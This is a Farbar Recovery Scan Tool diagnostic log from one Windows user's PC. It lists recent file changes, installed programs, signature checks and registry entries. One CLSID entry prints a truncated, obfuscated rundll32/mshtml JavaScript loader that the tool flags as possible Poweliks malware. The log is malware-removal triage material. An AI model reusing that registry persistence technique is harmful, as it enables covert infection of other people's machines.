2014-12-30 07:20 - 2013-11-14 01:28 - 00863592 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2014-12-30 07:18 - 2014-08-14 09:51 - 00000000 ____D () C:\Users\JWT\AppData\Local\Adobe
2014-12-30 07:18 - 2014-01-31 20:28 - 00000075 _____ () C:\Users\JWT\AppData\Roaming\sp_data.sys
2014-12-30 07:16 - 2014-01-31 23:55 - 00000000 __RDO () C:\Users\JWT\SkyDrive
2014-12-30 07:16 - 2014-01-31 20:31 - 00000920 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-12-30 07:14 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\system32\sru
2014-12-30 01:12 - 2014-01-31 20:35 - 00003598 _____ () C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3865632982-2122395147-3624827403-1002
2014-12-30 01:08 - 2014-08-31 19:36 - 01093825 _____ () C:\WINDOWS\WindowsUpdate.log
2014-12-30 01:07 - 2014-03-03 17:44 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-12-30 01:07 - 2013-08-22 08:45 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-12-30 01:06 - 2014-01-31 20:31 - 00000924 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-12-30 01:01 - 2014-11-22 16:56 - 00000918 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002UA.job
2014-12-30 00:51 - 2014-03-04 21:16 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-12-30 00:50 - 2014-08-21 12:06 - 00005198 _____ () C:\Users\JWT\Desktop\Rkill.txt
2014-12-30 00:45 - 2013-05-01 03:34 - 00000000 ____D () C:\ProgramData\Adobe
2014-12-30 00:45 - 2013-05-01 03:34 - 00000000 ____D () C:\Program Files (x86)\Adobe
2014-12-29 23:13 - 2014-03-03 20:20 - 02545664 ___SH () C:\Users\JWT\Desktop\Thumbs.db
2014-12-29 22:16 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\AppReadiness
2014-12-29 21:11 - 2014-02-01 00:08 - 00000000 ____D () C:\Program Files\SUPERAntiSpyware
2014-12-29 20:48 - 2014-02-01 20:43 - 00000836 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-12-29 20:48 - 2014-02-01 20:43 - 00000000 ____D () C:\Program Files\CCleaner
2014-12-29 20:40 - 2014-10-01 09:16 - 00000105 _____ () C:\WINDOWS\SysWOW64\get.dat
2014-12-29 20:35 - 2014-02-01 20:23 - 00000000 ____D () C:\Users\JWT\AppData\Roaming\BitTorrent
2014-12-29 20:19 - 2014-08-21 10:39 - 00145973 _____ () C:\WINDOWS\SysWOW64\tubekey.dat
2014-12-29 19:42 - 2014-02-24 10:57 - 04489216 ___SH () C:\Users\JWT\Downloads\Thumbs.db
2014-12-29 19:13 - 2014-03-04 21:10 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-12-28 22:53 - 2014-08-21 12:40 - 00000000 ____D () C:\AdwCleaner
2014-12-27 17:01 - 2014-11-22 16:56 - 00000866 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002Core.job
2014-12-27 16:52 - 2014-02-01 00:08 - 00000000 ____D () C:\Users\JWT\AppData\Roaming\vlc
2014-12-23 13:55 - 2014-01-31 23:33 - 00000000 ____D () C:\Users\JWT
2014-12-17 21:11 - 2012-07-26 01:59 - 00000000 ____D () C:\WINDOWS\CbsTemp
2014-12-15 23:12 - 2013-08-22 07:25 - 00262144 ___SH () C:\WINDOWS\system32\config\BBI
2014-12-12 21:37 - 2014-01-31 20:27 - 00000000 ____D () C:\Users\JWT\AppData\Local\Packages
2014-12-12 18:12 - 2014-08-01 01:25 - 01715224 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2014-12-12 18:12 - 2014-08-01 01:25 - 01291464 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2014-12-12 18:12 - 2014-03-03 18:24 - 02824504 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2014-12-12 18:12 - 2014-03-03 18:24 - 02210040 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2014-12-10 23:58 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\system32\sr-Latn-RS
2014-12-10 23:58 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\system32\sr-Latn-CS
2014-12-10 23:58 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\rescache
2014-12-10 23:01 - 2014-01-31 20:31 - 00002241 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-12-10 22:47 - 2014-03-04 21:16 - 00003718 _____ () C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2014-12-10 22:45 - 2013-12-03 20:06 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation
2014-12-10 13:27 - 2014-01-31 21:04 - 00000000 ____D () C:\WINDOWS\system32\MRT
2014-12-10 13:27 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\PolicyDefinitions
2014-12-10 13:25 - 2014-01-31 21:04 - 112710672 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2014-12-05 00:54 - 2014-05-28 18:53 - 00000000 ____D () C:\WINDOWS\Minidump
 
Files to move or delete:
====================
C:\ProgramData\SetStretch.exe
C:\ProgramData\SetStretch.VBS
 
 
Some content of TEMP:
====================
C:\Users\JWT\AppData\Local\Temp\Quarantine.exe
C:\Users\JWT\AppData\Local\Temp\SpotifyUninstall.exe
C:\Users\JWT\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-12-14 17:44
 
==================== End Of Log ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-12-2014
Ran by JWT at 2014-12-30 07:21:32
Running from C:\Users\JWT\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 15.0.0.293 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.4.980 - Adobe Systems Incorporated.)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.235 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Photoshop CS5 (HKLM-x32\...\{15FEDA5F-141C-4127-8D7E-B962D1742728}) (Version: 12.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CS5.5 (HKLM-x32\...\{0497EAED-70DA-4BBE-BEB3-AF77FD8788EA}) (Version: 5.5 - Adobe Systems Incorporated)
Adobe Story (HKLM-x32\...\com.adobe.AdobeStory.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.0.571 - Adobe Systems Incorporated)
Antares Autotune VST v5.09 (HKLM-x32\...\Antares Autotune VST_is1) (Version:  - )
Antares AVOX Evo VST RTAS v3.0.2 (HKLM-x32\...\Antares AVOX Evo VST RTAS_is1) (Version:  - )
Antares Harmony Engine VST RTAS v1.0 (HKLM-x32\...\Antares Harmony Engine VST RTAS_is1) (Version:  - Team AiR 2007)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ARIA Engine v1.1.0.6 (HKLM\...\ARIA Engine_is1) (Version:  - ViP Team)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.11 Beta2 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.6 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{9B6239BF-4E85-4590-8D72-51E30DB1A9AA}) (Version: 3.0.5 - ASUS)
ASUS ROG Gaming Mouse (HKLM-x32\...\{3B9E171F-A955-4834-B877-447C0A437260}) (Version: 2.00.025 - ASUS)
ASUS Screen Saver (HKLM\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.1 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0018 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 2.1.5 - ASUS)
ASUS WebStorage Sync Agent (HKLM-x32\...\ASUS WebStorage) (Version: 1.1.18.159 - ASUS Cloud Corporation)
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5230.52 - CyberLink Corp.)
ASUSDVD (x32 Version: 10.0.5230.52 - CyberLink Corp.) Hidden
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.310 - ASUSTEK)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0030 - ASUS)
Avid Effects (HKLM-x32\...\{A86F1158-A7F7-4E8C-98E3-88F4996E85EB}) (Version: 10.3.2 - Avid Technology, Inc.)
Avid Mbox 2 USB Drivers (x64) (HKLM\...\{F9242D4E-09E7-45C7-A53A-83375D0FAD42}) (Version: 9.0.2 - Avid Technology, Inc.)
Avid Pro Tools (HKLM-x32\...\{8E60BB71-7EF3-42ED-9F10-AA041F25841A}) (Version: 10.3.2 - Avid Technology, Inc.)
BitTorrent (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\BitTorrent) (Version: 7.8.2.30489 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.01 - Piriform)
ChromecastApp (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1383.0 - Google Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ETDWare PS/2-X64 11.5.9.1_WHQL (HKLM\...\Elantech) (Version: 11.5.9.1 - ELAN Microelectronic Corp.)
Firebird v2.1 (HKLM-x32\...\Tone2 Firebird_is1) (Version:  - Tone2)
FL Studio 11 (HKLM-x32\...\FL Studio 11) (Version:  - Image-Line)
FlowStone FL 3.0 (HKLM-x32\...\FlowStone) (Version:  - )
Galería de fotos (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Genesys USB Mass Storage Device (HKLM-x32\...\{959B7F35-2819-40C5-A0CD-3C53B5FCC935}) (Version: 4.3.0.3 - Genesys Logic)
Gladiator v1.2.2 (HKLM-x32\...\Tone2 Gladiator full_is1) (Version:  - Tone2)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.221 - SurfRight B.V.)
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version:  - Image-Line)
IL MiniHost (HKLM-x32\...\IL MiniHost) (Version:  - Image-Line)
IL Ogun (HKLM-x32\...\IL Ogun) (Version:  - Image-Line)
IL Shared Libraries (HKLM-x32\...\IL Shared Libraries) (Version:  - Image-Line)
IL Slicex (HKLM-x32\...\IL Slicex) (Version:  - Image-Line)
IL Vocodex (HKLM-x32\...\IL Vocodex) (Version:  - Image-Line)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.0.10.1372 - Intel Corporation)
Interlok driver setup x64 (HKLM\...\{25613C10-27D2-410B-942B-D922D5C3A7BE}) (Version: 5.9.0 - PACE Anti-Piracy, Inc.)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
License Support (HKLM-x32\...\InstallShield_{3165EA9B-36CC-499B-96FF-36FC30E10EF4}) (Version: 1.2.0.5555 - PACE Anti-Piracy, Inc.)
License Support (Version: 1.2.0.5555 - PACE Anti-Piracy, Inc.) Hidden
Luxonix Purity VSTi v1.1.2 (HKLM-x32\...\Luxonix Purity VSTi_is1) (Version:  - )
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Maximus (HKLM-x32\...\Maximus) (Version:  - Image-Line)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4454.1510 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\OneDriveSetup.exe) (Version: 17.3.1229.0918 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Mixed in Key (x32 Version: 1.0.1228.0 - Mixed In Key LLC) Hidden
Mixed In Key 6 (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\{c4a8c8d8-fa62-4414-8a8b-3221bea4c6ef}) (Version: 6.0.1228.0 - Mixed In Key LLC)
Morphine (HKLM-x32\...\Morphine) (Version:  - Image-Line bvba)
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 33.1.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.1.1 (x86 en-US)) (Version: 33.1.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MyBitCast 2.0 (HKLM-x32\...\MyBitCast) (Version: 2.0 - ASUS)
Native Instruments Abbey Road 60s Drummer (HKLM-x32\...\Native Instruments Abbey Road 60s Drummer) (Version:  - Native Instruments)
Native Instruments Absynth 5 (HKLM-x32\...\Native Instruments Absynth 5) (Version:  - Native Instruments)
Native Instruments Battery 4 (HKLM-x32\...\Native Instruments Battery 4) (Version: 4.1.2.2354 - Native Instruments)
Native Instruments Battery 4 Factory Library (HKLM-x32\...\Native Instruments Battery 4 Factory Library) (Version: 1.0.0.002 - Native Instruments)
Native Instruments Berlin Concert Grand (HKLM-x32\...\Native Instruments Berlin Concert Grand) (Version:  - Native Instruments)
Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version:  - Native Instruments)
Native Instruments FM8 (HKLM-x32\...\Native Instruments FM8) (Version: 1.3.0.1244 - Native Instruments)
Native Instruments Guitar Rig 5 (HKLM-x32\...\Native Instruments Guitar Rig 5) (Version: 5.2.0.2770 - Native Instruments)
Native Instruments Guitar Rig Mobile IO Driver (HKLM-x32\...\Native Instruments Guitar Rig Mobile IO Driver) (Version:  - Native Instruments)
Native Instruments Guitar Rig Pro Library for Maschine (HKLM-x32\...\Native Instruments Guitar Rig Pro Library for Maschine) (Version:  - Native Instruments)
Native Instruments Guitar Rig Session IO Driver (HKLM-x32\...\Native Instruments Guitar Rig Session IO Driver) (Version:  - Native Instruments)
Native Instruments Komplete 9 (HKLM-x32\...\Native Instruments Komplete 9) (Version:  - Native Instruments)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.3.0.6464 - Native Instruments)
Native Instruments Kontakt Factory Library (HKLM-x32\...\Native Instruments Kontakt Factory Library) (Version: 1.1.0.6 - Native Instruments)
Native Instruments Massive (HKLM-x32\...\Native Instruments Massive) (Version: 1.4.0.292 - Native Instruments)
Native Instruments Monark (HKLM-x32\...\Native Instruments Monark) (Version: 1.1.0.2 - Native Instruments)
Native Instruments New York Concert Grand (HKLM-x32\...\Native Instruments New York Concert Grand) (Version:  - Native Instruments)
Native Instruments Rammfire (HKLM-x32\...\Native Instruments Rammfire) (Version: 2.0.0.4 - Native Instruments)
Native Instruments Rammfire for Maschine (HKLM-x32\...\Native Instruments Rammfire for Maschine) (Version:  - Native Instruments)
Native Instruments Reaktor 5 (HKLM-x32\...\Native Instruments Reaktor 5) (Version:  - Native Instruments)
Native Instruments Reaktor Prism (HKLM-x32\...\Native Instruments Reaktor Prism) (Version:  - Native Instruments)
Native Instruments Reaktor Spark R2 (HKLM-x32\...\Native Instruments Reaktor Spark R2) (Version:  - Native Instruments)
Native Instruments Reflektor (HKLM-x32\...\Native Instruments Reflektor) (Version:  - Native Instruments)
Native Instruments Reflektor for Maschine (HKLM-x32\...\Native Instruments Reflektor for Maschine) (Version:  - Native Instruments)
Native Instruments Retro Machines Mk2 (HKLM-x32\...\Native Instruments Retro Machines Mk2) (Version:  - Native Instruments)
Native Instruments Rig Kontrol 3 Driver (HKLM-x32\...\Native Instruments Rig Kontrol 3 Driver) (Version:  - Native Instruments)
Native Instruments Scarbee MM-Bass (HKLM-x32\...\Native Instruments Scarbee MM-Bass) (Version:  - Native Instruments)
Native Instruments Scarbee Vintage Keys (HKLM-x32\...\Native Instruments Scarbee Vintage Keys) (Version:  - Native Instruments)
Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.4.0.1093 - Native Instruments)
Native Instruments Session Strings (HKLM-x32\...\Native Instruments Session Strings) (Version:  - Native Instruments)
Native Instruments Solid Bus Comp FX (HKLM-x32\...\Native Instruments Solid Bus Comp FX) (Version: 1.0.0.276 - Native Instruments)
Native Instruments Solid Dynamics FX (HKLM-x32\...\Native Instruments Solid Dynamics FX) (Version: 1.1.1.427 - Native Instruments)
Native Instruments Solid EQ FX (HKLM-x32\...\Native Instruments Solid EQ FX) (Version: 1.1.1.427 - Native Instruments)
Native Instruments Studio Drummer (HKLM-x32\...\Native Instruments Studio Drummer) (Version:  - Native Instruments)
Native Instruments The Finger R2 (HKLM-x32\...\Native Instruments The Finger R2) (Version: 1.3.0.2 - Native Instruments)
Native Instruments The Giant (HKLM-x32\...\Native Instruments The Giant) (Version:  - Native Instruments)
Native Instruments Traktors 12 (HKLM-x32\...\Native Instruments Traktors 12) (Version:  - Native Instruments)
Native Instruments Traktors 12 for Maschine (HKLM-x32\...\Native Instruments Traktors 12 for Maschine) (Version:  - Native Instruments)
Native Instruments Transient Master FX (HKLM-x32\...\Native Instruments Transient Master FX) (Version:  - Native Instruments)
Native Instruments Upright Piano (HKLM-x32\...\Native Instruments Upright Piano) (Version:  - Native Instruments)
Native Instruments Vienna Concert Grand (HKLM-x32\...\Native Instruments Vienna Concert Grand) (Version:  - Native Instruments)
Native Instruments Vintage Organs (HKLM-x32\...\Native Instruments Vintage Organs) (Version:  - Native Instruments)
Native Instruments West Africa (HKLM-x32\...\Native Instruments West Africa) (Version:  - Native Instruments)
NVIDIA 3D Vision Driver 344.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 344.65 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.1.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.5 - NVIDIA Corporation)
NVIDIA Graphics Driver 344.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 344.65 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation)
Octoshape Streaming Services (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\Octoshape Streaming Services) (Version:  - Octoshape ApS)
PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Plogue chipsounds VSTi RTAS Standalone v1.5 (HKLM\...\Plogue chipsounds_is1) (Version:  - ViP Team)
PoiZone (HKLM-x32\...\PoiZone) (Version:  - Image-Line)
PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
Qualcomm Atheros Bandwidth Control Filter Driver (Version: 1.0.33.1267 - Qualcomm Atheros) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.316 - Qualcomm Atheros Communications)
Qualcomm Atheros Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.1.0.17 - Qualcomm Atheros Inc.)
Qualcomm Atheros Killer Wireless-N Drivers (Version: 1.0.33.1267 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer Wireless-N Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.0.33.1267 - Qualcomm Atheros)
Qualcomm Atheros Network Manager (Version: 1.0.33.1267 - Qualcomm Atheros) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7023 - Realtek Semiconductor Corp.)
reFX Vanguard VSTi v1.6.1 (HKLM-x32\...\reFX Vanguard VSTi_is1) (Version:  - )
Sakura (HKLM-x32\...\Sakura) (Version:  - Image-Line)
Sawer (HKLM-x32\...\Sawer) (Version:  - Image-Line)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SHIELD Streaming (Version: 3.1.3000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 16.18.9 - NVIDIA Corporation) Hidden
SimSynth (HKLM-x32\...\SimSynth) (Version:  - Image-Line)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.7.1018 - SUPERAntiSpyware.com)
Sytrus (HKLM-x32\...\Sytrus) (Version:  - Image-Line)
Toxic Biohazard (HKLM-x32\...\Toxic Biohazard) (Version:  - Image-Line bvba)
Visual C++ 64-bit Redistributables (HKLM-x32\...\InstallShield_{FB03650C-B373-4B20-ACA5-B7BA1A8EEE33}) (Version: 1.2.0.5555 - PACE Anti-Piracy, Inc.)
Visual C++ Redistributables (HKLM-x32\...\InstallShield_{F03117FA-9270-46B0-9666-0B4BC2CDEBF5}) (Version: 1.2.0.5555 - PACE Anti-Piracy, Inc.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Waves Complete V9r1 (HKLM-x32\...\{90000001-C561-4E32-99EB-3C5AD3683A70}) (Version: 9.0.1 - Waves)
Widevine Media Optimizer Chrome 6.0.0 (HKLM-x32\...\optimizer_chrome) (Version: 6.0.0.12442 - Widevine Technologies)
Widevine Media Optimizer Chrome 6.0.0 (HKU\.DEFAULT\...\optimizer_chrome) (Version: 6.0.0.12757 - Widevine Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
影像中心 (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
照片库 (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\JWT\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\JWT\AppData\Local\DIRECTV Player\win64\npPlayerPlugin64.dll No File
